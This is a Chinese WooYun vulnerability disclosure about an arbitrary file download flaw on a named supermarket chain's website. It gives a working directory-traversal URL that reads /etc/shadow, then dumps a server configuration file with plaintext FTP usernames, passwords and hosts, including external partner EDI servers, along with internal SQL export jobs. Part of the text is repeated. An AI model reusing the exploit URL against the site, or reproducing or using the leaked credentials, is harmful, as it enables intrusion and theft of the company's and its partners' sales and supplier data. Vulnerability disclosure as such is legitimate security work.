乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-09: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-10-24: 厂商已经主动忽略漏洞,细节向公众公开
人人乐连锁商业集团股份有限公司(股票代码为002336)前身为深圳市人人乐连锁商业有限公司,成立于1996年4月。公司主营业务为大卖场、综合超市和百货的连锁经营。
漏洞所在链接:http://www.renrenle.cn/share/download.jsp?filePath=admin/upload/1342576091234.doc&fileName=1342576091234.doc通过修改文件路径实现任意文件下载:系统为linux,直接下载shadow文件:http://www.renrenle.cn/share/download.jsp?filePath=../../../../../../../../../../../etc/shadow&fileName=shadow
可以直觉读取shadow,web服务权限比较高。通过读取源文件追踪到配置文件路径:/opt/jboss/server/default/deploy/ws.war/WEB-INF/web.xml/opt/jboss/server/default/deploy/ws.war/WEB-INF/conf/app-context.xml/opt/jboss/server/default/deploy/ws.war/WEB-INF/sql.tld/opt/jboss/server/default/deploy/mpwx.war/WEB-INF/web.xml/opt/jboss/server/default/deploy/testws.war/WEB-INF/classes/conf/MallWSConfig.xml/home/ftp1007/exportConfig.xml/opt/jboss/server/default/deploy/scm.war/WEB-INF/struts-config.xml动过读取这些配置文件获得很多铭感信息:本服务器FTP链接信息: <property name="host">127.0.0.1</property> <property name="port">21</property> <property name="username">ftp1003</property> <property name="password">ac1003ln</property> <property name="workDir">/download</property>
配置文件存在大量ftp登录信息,可以通过登录这些账户获得大量销售信息:配置文件:/opt/jboss/server/default/deploy/scm.war/WEB-INF/classes/exportConfig.xml内容如下:
<configuration> <export> <!-- AC尼尔森 --> <company name="ACNielsen"> <job> <property name="sql"><![CDATA[select a.shopID,a.vgno,trunc(b.deptid/100),b.goodsno,b.gname,b.spec,b.uname,round(sum(a.qty),2),case sum(a.qty) when 0 then 0 else round(sum(a.salevalue)/sum(a.qty),3) end,round(sum(salevalue),3) from sale a,goods b,shop c where a.vgno=b.vgno and a.shopID=c.shopID and a.flag= 0 and a.supflag=0 and substr(b.deptID,1,2) in(11,12,13,14,15,16,17,18,31,32,33,41,42,43,44,51,52,53,54,61,62,63,64,65,66,67,68) and a.sdate > ? and a.sdate <= ? group by 1,2,3,4,5,6,7]]></property> <property name="encoding">8859_1</property> <property name="separator">|</property> <property name="exportHead"><![CDATA[店号|商品代码|中类代码|商品条码|商品描述|商品规格|单位|销售量|单价|销售金额]]></property> <property name="lastExported">2014-07-20</property> <property name="periods">7</property> <property name="periodFlag">D</property> <property name="transmitProtocol">ftp</property> <property name="host">127.0.0.1</property> <property name="port">21</property> <property name="username">ftp1003</property> <property name="password">ac1003ln</property> <property name="workDir">/download</property> </job> </company> <!--- 上海捷孚凯(GFK) - --> <company name="GFK"> <job> <property name="sql"><![CDATA[select Trim(d.shopid)||"|"||d.name HeadID,Trim(c.shopid)||"|"||c.name shopID,b.BrandName,b.DeptID||"|"||p.Name,b.vgno,b.gname,b.spec,round(sum(a.qty),2),case sum(a.qty) when 0 then 0 else round(sum(a.salevalue)/sum(a.qty),3) end from sale a,goods b,shop c,shop d,Dept p where a.vgno=b.vgno and a.shopid=c.shopid and c.headid=d.shopid and b.deptid=p.id and a.flag= 0 and a.supflag=0 and a.sdate >= ? and a.sdate < ? and substr(b.deptid,1,1)=4 and b.runtype=0 group by 1,2,3,4,5,6,7 order by 1,2]]></property> <property name="encoding">8859_1</property> <property name="separator">|</property> <property name="exportHead"><![CDATA[城市编号|城市|商店编号|商店名称|品牌编号|品牌|类别编号|类别名称|商品编码|商品名称|型号|销量|价格]]></property> <property name="lastExported">2008-06-01</property> <property name="periods">1</property> <property name="periodFlag">M</property> <property name="transmitProtocol">ftp</property> <property name="host">172.25.100.18</property> <property name="port">21</property> <property name="username">ftp1004</property> <property name="password">sh1004gfk</property> <property name="workDir">/download</property> </job> </company> <!-- -北京中怡康- --> <company name="ZYK"> <job> <property name="sql"><![CDATA[select Trim(d.shopid)||"|"||d.name HeadID,Trim(c.shopid)||"|"||c.name shopID,b.BrandName,b.DeptID||"|"||p.Name,b.spec,round(sum(a.qty),2),round(sum(salevalue),3) from sale a,goods b,shop c,shop d,Dept p where a.vgno=b.vgno and a.shopid=c.shopid and c.headid=d.shopid and b.deptid=p.id and a.flag= 0 and a.supflag=0 and a.sdate >= ? and a.sdate < ? and substr(b.deptid,1,1)=4 and b.runtype=0 group by 1,2,3,4,5 order by 1,2]]></property> <property name="encoding">8859_1</property> <property name="separator">|</property> <property name="exportHead"><![CDATA[城市编号|城市|门店编号|门店名称|品牌编号|品牌|类别编号|类别名称|型号|零售量|零售额]]></property> <property name="lastExported">2014-06-01</property> <property name="periods">1</property> <property name="periodFlag">M</property> <property name="transmitProtocol">ftp</property> <property name="host">127.0.0.1</property> <property name="port">21</property> <property name="username">ftp1005</property> <property name="password">bj1005zyk</property> <property name="workDir">/download</property> </job> </company> <!-- -宝洁- --> <company name="PG"> <job> <property name="sql"><![CDATA[select a.SheetID,c.customno,b.qty,b.cost,'' actualQty,a.shopid,b.goodsno,a.note,a.editdate,a.deliverdate,a.purday,f.name shopName,a.purchaseshopid,g.name purchaseshopName,a.supplyid,d.name supplyName,a.paytypename,a.ManageDeptName,b.vgno,b.gname,b.spec,b.PKNum,b.uname,case when b.PKNum=0 then b.qty else round(b.qty/b.PKNum,2) end PKNums from OrderModu a,OrderItem b,Goods c,Supply d,outer Shop f,outer shop g where a.SheetID=b.SheetID and b.vgno=c.Vgno and a.SupplyID=d.supplyid and a.supplyid in(10805,10806,10860,13093,14184,16629,2536,2539,2957,3784,3785,9284,9334) and a.editDate > ? and a.editDate<=? and substr(a.SheetID,1,4) in('A001','G001') and a.shopid=f.shopid and a.purchaseshopid=g.shopid and a.shopid='L001' order by a.sheetid]]></property> <!-- <property name="sql"><![CDATA[select a.SheetID from OrderModu a where a.supplyid in(10805,10806,10860,13093,14184,16629,2536,2539,2957,3784,3785,9284,9334) and a.editDate > ? and a.editDate<=? and substr(a.SheetID,1,4) in('A001','G001') and a.shopid=a.purchaseshopid and a.shopid='L001' order by a.sheetid]]></property> --> <property name="encoding">8859_1</property> <property name="separator">,</property> <property name="exportHead"><![CDATA[订单号,客户商品编码,订货数量,进价,实际送货数,送货店号,条码,备注,订货日期,要求送货日,有效天数,送货店名,订货店号,订货店名,供应商编号,供应商名称,结算方式,管理课,商品编码,商品名,商品规格,包装规格,订货单位,件数]]></property> <property name="lastExported">2009-02-19</property> <property name="periods">0</property> <property name="periodFlag">N</property> <property name="transmitProtocol">ftp</property> <property name="host">127.0.0.1</property> <property name="port">21</property> <property name="username">ftp1006</property> <property name="password">gz1006pg</property> <property name="workDir">/download</property> </job> </company> <!-- -EDI订单(PG)- --> <company name="EDI"> <job> <property name="sql"><![CDATA[select distinct a.refsheetid from ordermodu a where a.SupplyID in(select supplyid from supplyedi where edino=1) and a.EDIFlag=1 and a.EDIStatus=1 and a.EditDate>=today-30 and a.ActiveFlag in(0,3) order by a.refsheetid]]></property> <property name="beforeExport"><![CDATA[update ordermodu set EDIStatus=1 where SupplyID in(select supplyid from supplyedi where edino=1) and EDIFlag=1 and EDIStatus=0 and EditDate>=today-30 and ActiveFlag in(0,3) and (EDISendTime is null or EDISendTime<=current)]]></property> <property name="afterExport"><![CDATA[update ordermodu set EDIStatus=2 where SupplyID in(select supplyid from supplyedi where edino=1) and EDIFlag=1 and EDIStatus=1 and EditDate>=today-30 and ActiveFlag in(0,3)]]></property> <property name="exportUrl"><![CDATA[http://127.0.0.1/scm/order/ediOrderAction.do?method=printEDIOrder&shopID=RRL001]]></property> <property name="encoding">8859_1</property> <property name="separator">|</property> <property name="lastExported">2014-07-27</property> <property name="periods">0</property> <property name="periodFlag">N</property> <property name="transmitProtocol">ftp</property> <!-- <property name="transmitMode">1</property> <property name="host">172.25.0.18</property> <property name="port">21</property> <property name="username">ftp1006</property> <property name="password">gz1006pg</property> <property name="workDir">/Backup</property> --> <property name="localWorkDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/edi/</property> <property name="localBackupDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/edi/backup/</property> <property name="checkFilter">.txt</property> <!-- -传输模式 1=主动 0=被动 默认为主动模式- --> <property name="transmitMode">0</property> <property name="host">pngftp.myb2bi.com</property> <property name="port">9090</property> <property name="username">renrenle</property> <property name="password">renrenle</property> </job> </company> <!-- -EDI订单(徐福记)- --> <company name="EDIXJ"> <job> <property name="sql"><![CDATA[select distinct a.refsheetid from ordermodu a where a.SupplyID in(select supplyid from supplyedi where edino=2) and a.EDIFlag=1 and a.EDIStatus=1 and a.EditDate>=today-30 and a.ActiveFlag in(0,3) order by a.refsheetid]]></property> <property name="beforeExport"><![CDATA[update ordermodu set EDIStatus=1 where SupplyID in(select supplyid from supplyedi where edino=2) and EDIFlag=1 and EDIStatus=0 and EditDate>=today-30 and ActiveFlag in(0,3) and (EDISendTime is null or EDISendTime<=current)]]></property> <property name="afterExport"><![CDATA[update ordermodu set EDIStatus=2 where SupplyID in(select supplyid from supplyedi where edino=2) and EDIFlag=1 and EDIStatus=1 and EditDate>=today-30 and ActiveFlag in(0,3)]]></property> <property name="exportUrl"><![CDATA[http://127.0.0.1/scm/order/ediOrderAction.do?method=printEDIOrder&shopID=RRL001]]></property> <property name="encoding">8859_1</property> <property name="separator">|</property> <property name="lastExported">2014-07-27</property> <property name="periods">0</property> <property name="periodFlag">N</property> <property name="transmitProtocol">ftp</property> <property name="localWorkDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/edixj/</property> <property name="localBackupDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/edixj/backup/</property> <property name="checkFilter">.txt</property> <!-- -传输模式 1=主动 0=被动 默认为主动模式- --> <property name="transmitMode">0</property> <property name="host">119.147.24.89</property> <property name="port">15923</property> <property name="username">edi_rrl</property> <property name="password">Edi_Rrl_2013</property> </job> </company> <!-- -EDI(宝洁单品每日事实数据)- --> <company name="BJDaySale"> <job> <property name="sql"><![CDATA[select goodsno,vgno,shopid,sdate,planid,promid,wholeflag,truesalevalue,gcostnotax,ordervalue,stockvalue,qty,notaxcostvalue,stockqty,automakeupid,notaxpkcost from bjdaysale where EDIStatus=1 and sdate=today-1 and areaid=?]]></property> <property name="beforeExport"><![CDATA[update bjdaysale set EDIStatus=1 where EDIStatus=0 and sdate=today-1]]></property> <property name="afterExport"><![CDATA[update bjdaysale set EDIStatus=2 where EDIStatus=1 and sdate=today-1]]></property> <property name="encoding">8859_1</property> <property name="separator">|</property> <property name="exportHeader"><![CDATA[国际条形码|客户码|门店/大仓代码|日期|邮报编号(档期+区域)|促销类型|批发标志|当日销售金额(未税)|当日销售前台利润(未税)|当日进货金额(未税)|当日库存金额(未税)|销售数量|进货数量|库存数量|产品状态|当日系统进价(未税)]]></property> <property name="lastExported">2014-07-27</property> <property name="periods">0</property> <property name="periodFlag">N</property> <property name="transmitProtocol">ftp</property> <property name="localWorkDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjdaysale/</property> <property name="localBackupDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjdaysale/backup/</property> <property name="checkFilter">.txt</property> <!-- -传输模式 1=主动 0=被动 默认为主动模式- --> <property name="transmitMode">0</property> <property name="host">119.147.24.89</property> <property name="port">15923</property> <property name="username">rrl_pos</property> <property name="password">rrl_pos_20130806</property> <property name="FileNameHead">RENRENLEBJ</property> <property name="FileNameType">PGPOS</property> <property name="FileNamelast">Original.txt</property> <property name="FileNameSplit">-</property> </job> </company> <!-- -EDI(宝洁品类事实数据)- --> <company name="BJDeptSale"> <job> <property name="sql"><![CDATA[select supplyid,deptid,z_deptid,d_deptid,shopid,sdate,planid,wholeflag,truesalevalue from bjdeptsale where EDIStatus=1 and sdate=today-1 and areaid=?]]></property> <property name="beforeExport"><![CDATA[update bjdeptsale set EDIStatus=1 where EDIStatus=0 and sdate=today-1]]></property> <property name="afterExport"><![CDATA[update bjdeptsale set EDIStatus=2 where EDIStatus=1 and sdate=today-1]]></property> <property name="encoding">8859_1</property> <property name="separator">|</property> <property name="exportHeader"><![CDATA[供应商|客户小类代码|客户中类代码|客户大类代码|门店代码|客户时间(天/客户周)|邮报编号|批发标志|销售额(未税)]]></property> <property name="lastExported">2014-07-17</property> <property name="periods">0</property> <property name="periodFlag">N</property> <property name="transmitProtocol">ftp</property> <property name="localWorkDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjdeptsale/</property> <property name="localBackupDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjdeptsale/backup/</property> <property name="checkFilter">.txt</property> <!-- -传输模式 1=主动 0=被动 默认为主动模式- --> <property name="transmitMode">0</property> <property name="host">119.147.24.89</property> <property name="port">15923</property> <property name="username">rrl_pos</property> <property name="password">rrl_pos_20130806</property> <property name="FileNameHead">RENRENLEBJ</property> <property name="FileNameType">PGCategory</property> <property name="FileNamelast">Original.txt</property> <property name="FileNameSplit">-</property> </job> </company> <!-- -EDI(宝洁产品主数据)- --> <company name="BJGoods"> <job> <property name="sql"><![CDATA[select goodsno,vgno,gname,pknum,whl,keepdays,d_deptid,d_deptname,z_deptid,z_deptname,x_deptid,x_deptname from bjgoods where EDIStatus=1 and sdate=today-1 and areaid=?]]></property> <property name="beforeExport"><![CDATA[update bjgoods set EDIStatus=1 where EDIStatus=0 and sdate=today-1]]></property> <property name="afterExport"><![CDATA[update bjgoods set EDIStatus=2 where EDIStatus=1 and sdate=today-1]]></property> <property name="backExport"><![CDATA[update bjgoods set EDIStatus=0 where EDIStatus=2 and sdate=today-1]]></property> <property name="encoding">8859_1</property> <property name="separator">|</property> <property name="exportHeader"><![CDATA[国际条形码|客户码|产品名称|产品规格|外箱尺寸|产品有效期|客户大类代码|客户大类描述|客户中类代码|客户中类代码描述|客户小类代码|客户小类描述]]></property> <property name="lastExported">2014-05-26</property> <property name="periods">0</property> <property name="periodFlag">N</property> <property name="transmitProtocol">ftp</property> <property name="localWorkDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjgoods/</property> <property name="localBackupDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjgoods/backup/</property> <property name="checkFilter">.txt</property> <!-- -传输模式 1=主动 0=被动 默认为主动模式- --> <property name="transmitMode">0</property> <property name="host">119.147.24.89</property> <property name="port">15923</property> <property name="username">rrl_pos</property> <property name="password">rrl_pos_20130806</property> <property name="FileNameHead">RENRENLEBJ</property> <property name="FileNameType">PGArticles</property> <property name="FileNamelast">Original.txt</property> <property name="FileNameSplit">-</property> </job> </company> <!-- -EDI(BJ门店数据)- --> <company name="BJShop"> <job> <property name="sql"><![CDATA[select unique id,rationshopid,name,headid,headname,sdate,closeflag from bjshop where EDIStatus=1 and loadsdate=today-1 order by id]]></property> <property name="beforeExport"><![CDATA[update bjshop set EDIStatus=1 where EDIStatus=0 and loadsdate=today-1]]></property> <property name="afterExport"><![CDATA[update bjshop set EDIStatus=2 where EDIStatus=1 and loadsdate=today-1]]></property> <property name="encoding">8859_1</property> <property name="separator">|</property> <property name="exportHeader"><![CDATA[门店/大仓代码|门店对应大仓代码|门店/大仓名称|门店区域代码|门店区域描述|开店时间|门店状态]]></property> <property name="lastExported">2014-05-21</property> <property name="periods">0</property> <property name="periodFlag">N</property> <property name="transmitProtocol">ftp</property> <property name="localWorkDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjshop/</property> <property name="localBackupDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjshop/backup/</property> <property name="checkFilter">.txt</property> <!-- -传输模式 1=主动 0=被动 默认为主动模式- --> <property name="transmitMode">0</property> <property name="host">119.147.24.89</property> <property name="port">15923</property> <property name="username">rrl_pos</property> <property name="password">rrl_pos_20130806</property> <property name="FileNameHead">RENRENLEBJ</property> <property name="FileNameType">StoreArticles</property> <property name="FileNamelast">Original.txt</property> <property name="FileNameSplit">-</property> </job> </company> <!-- -EDI(BJ促销数据)- --> <company name="BJProm"> <job> <property name="sql"><![CDATA[select planid,shopid,supplyid,paytypeid,vgno,goodsno,pricebegindate,priceenddate from bjprom where EDIStatus=1 and sdate=today-1]]></property> <property name="beforeExport"><![CDATA[update bjprom set EDIStatus=1 where EDIStatus=0 and sdate=today-1]]></property> <property name="afterExport"><![CDATA[update bjprom set EDIStatus=2 where EDIStatus=1 and sdate=today-1]]></property> <property name="encoding">8859_1</property> <property name="separator">|</property> <property name="exportHeader"><![CDATA[邮报编号|门店代码|供应商|结算方式|客户码|国际条形码|邮报开始日期|邮报结束日期]]></property> <property name="lastExported">2014-05-25</property> <property name="periods">0</property> <property name="periodFlag">N</property> <property name="transmitProtocol">ftp</property> <property name="localWorkDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjprom/</property> <property name="localBackupDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/bjprom/backup/</property> <property name="checkFilter">.txt</property> <!-- -传输模式 1=主动 0=被动 默认为主动模式- --> <property name="transmitMode">0</property> <property name="host">119.147.24.89</property> <property name="port">15923</property> <property name="username">rrl_pos</property> <property name="password">rrl_pos_20130806</property> <property name="FileNameHead">RENRENLEBJ</property> <property name="FileNameType">PGPromPlan</property> <property name="FileNamelast">Original.txt</property> <property name="FileNameSplit">-</property> </job> </company> <!-- -EDI(宝洁商品进价数据)- --> <company name="BJGoodsCost"> <job> <property name="sql"><![CDATA[select goodsno,vgno,gname,pknum,clearflag,cost,keepdays from bjgoodscost where EDIStatus=1 and sdate=today-1 and areaid=?]]></property> <property name="beforeExport"><![CDATA[update bjgoodscost set EDIStatus=1 where EDIStatus=0 and sdate=today-1]]></property> <property name="afterExport"><![CDATA[update bjgoodscost set EDIStatus=2 where EDIStatus=1 and sdate=today-1]]></property> <property name="encoding">8859_1</property> <property name="separator">|</property> <property name="exportHeader">05/25/2014</property> <property name="exportFooter">@UNZ-END</property> <property name="lastExported">2014-05-25</property> <property name="periods">0</property> <property name="periodFlag">N</property> <property name="transmitProtocol">ftp</property> <property name="localWorkDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/download/</property> <property name="localBackupDir">/opt/jboss-4.2.3.GA/server/default/deploy/scm.war/order/download/backup/</property> <property name="checkFilter">.txt</property> <property name="transmitMode">0</property> <property name="host">127.0.0.1</property> <property name="port">21</property> <property name="username">ftp1007</property> <property name="password">pg1007$2014</property> <property name="workDir">/download</property> <property name="FileNameHead">RENRENLEBJ</property> <property name="FileNamelast">supplygoods.txt</property> <property name="FileNameSplit">-</property> </job> </company> </export> </configuration>
泄漏所有集团旗下个商城商品数据和销售数据:
可以直接读取shadow,web服务权限比较高。通过读取源文件追踪到配置文件路径:/opt/jboss/server/default/deploy/ws.war/WEB-INF/web.xml/opt/jboss/server/default/deploy/ws.war/WEB-INF/conf/app-context.xml/opt/jboss/server/default/deploy/ws.war/WEB-INF/sql.tld/opt/jboss/server/default/deploy/mpwx.war/WEB-INF/web.xml/opt/jboss/server/default/deploy/testws.war/WEB-INF/classes/conf/MallWSConfig.xml/home/ftp1007/exportConfig.xml/opt/jboss/server/default/deploy/scm.war/WEB-INF/struts-config.xml读取这些配置文件获得旗下商城上传产品信息所用FTP用户和密码:本服务器FTP链接信息: <property name="host">127.0.0.1</property> <property name="port">21</property> <property name="username">ftp1003</property> <property name="password">ac1003ln</property> <property name="workDir">/download</property>
配置文件存在大量ftp登录信息,登录不同账户对应不同商城的信息,通过登录这些账户可获得大量销售信息:配置文件:/opt/jboss/server/default/deploy/scm.war/WEB-INF/classes/exportConfig.xml内容如下:
逻辑过滤
未能联系到厂商或者厂商积极拒绝
漏洞Rank:8 (WooYun评价)
